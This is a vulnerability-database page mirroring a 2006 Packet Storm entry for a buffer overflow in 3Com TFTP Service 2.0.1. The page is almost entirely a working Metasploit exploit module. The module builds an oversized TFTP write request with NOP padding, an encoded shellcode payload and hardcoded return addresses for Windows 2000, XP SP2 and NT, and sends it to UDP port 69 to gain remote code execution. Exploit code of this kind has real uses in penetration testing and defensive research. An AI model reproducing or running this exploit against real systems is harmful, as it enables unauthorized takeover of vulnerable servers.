Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

3comtftp.txt

🗓️ 06 Dec 2006 00:00:00Reported by Kurt GrutzmacherType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

3Com TFTP Service version 2.0.1 suffers from a long type buffer overflow during a write TFTP request, attacker controls ESI

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Doesn't look like SEH is being overwritten so I'm having trouble getting  
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K.   
Includes offsets for NT, 2K and XP (call esi).  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote  
  
include Exploit::Remote::Udp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',  
'Description' => %q{  
3Com TFTP Service version 2.0.1 suffers from a long type buffer  
overflow during a write TFTP request. Does not require write access  
to be enabled on the server.  
  
Attacker controls ESI.  
  
Liu Qixu of NCNIPC published this vulnerability.  
},  
'Author' => 'grutz [at] jingojango.net',  
'Version' => '$$',  
'References' =>   
[   
['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],  
['BID', '21301'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 440,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
  
'Targets' =>  
[  
['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ], # call esi ws2help  
['Windows XP SP2 English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help  
['Windows NT SP5/6 English', { 'Ret' => 0x776a117e } ], # call esi ws2help  
],  
  
'DefaultTarget' => 0,  
'Privileged' => false,  
'DisclosureDate' => 'Nov 27 2006'  
  
))  
  
register_options(  
[  
Opt::RPORT(69)  
], self)  
  
end  
  
def exploit  
connect_udp  
  
print_status("Trying target #{target.name}...")  
  
sploit =   
"\x00\x02" +   
Rex::Text.rand_text_english(1, payload_badchars) +   
"\x00" +  
make_nops(473) +  
[target.ret].pack('V') +  
"\x00"  
  
sploit[9, payload.encoded.length] = payload.encoded  
  
udp_sock.put(sploit)  
  
disconnect_udp   
end  
  
end  
end  
  
  
--   
..:[ grutz at jingojango dot net ]:..  
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4  
"There's just no amusing way to say, 'I have a CISSP'."  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow3com tftpesi controlsecurity vulnerabilityremote exploitwindows osdep-enabledxpsp22k3xpwin2k
16
.json
Report